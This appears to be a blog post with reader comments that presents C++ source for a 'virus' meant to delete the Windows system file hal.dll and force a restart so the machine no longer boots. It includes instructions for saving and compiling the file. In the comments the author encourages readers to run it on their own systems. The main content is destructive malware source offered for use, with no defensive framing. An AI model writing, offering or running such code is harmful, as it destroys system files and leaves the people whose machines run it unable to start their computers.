This virus will delete the hal.dll (this file helps the system in startup) in your system32 folder. After performing such task your will no longer will be able to start your system.....
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
After typing the above source code in notepad ,save the file as bee.cpp.
After saving...
compile the source file ...
You will get a .exe file
On opening the .exe file your system will restart and crash...
I doubt if it wud work, so can u plz demonstrate it in ur pc..???;-) well, Ethical Hacker turns into a potential Virus programmer huh???
ReplyDelete@rahul try this in ur system...U have alternate os know??
Deletealways saying that u r vetti but c now wat u r dng???? fooling others!!
ReplyDeleteand another one issue if u r posting on your blog u should test it then only u should post it... so first verify then post it!!
rytly said mate.. first he himself must check it..
Delete@vignesh I checked,it works....if u have doubt check in your system....
ReplyDeletecan i get software or something to do to detect such virus ?
ReplyDelete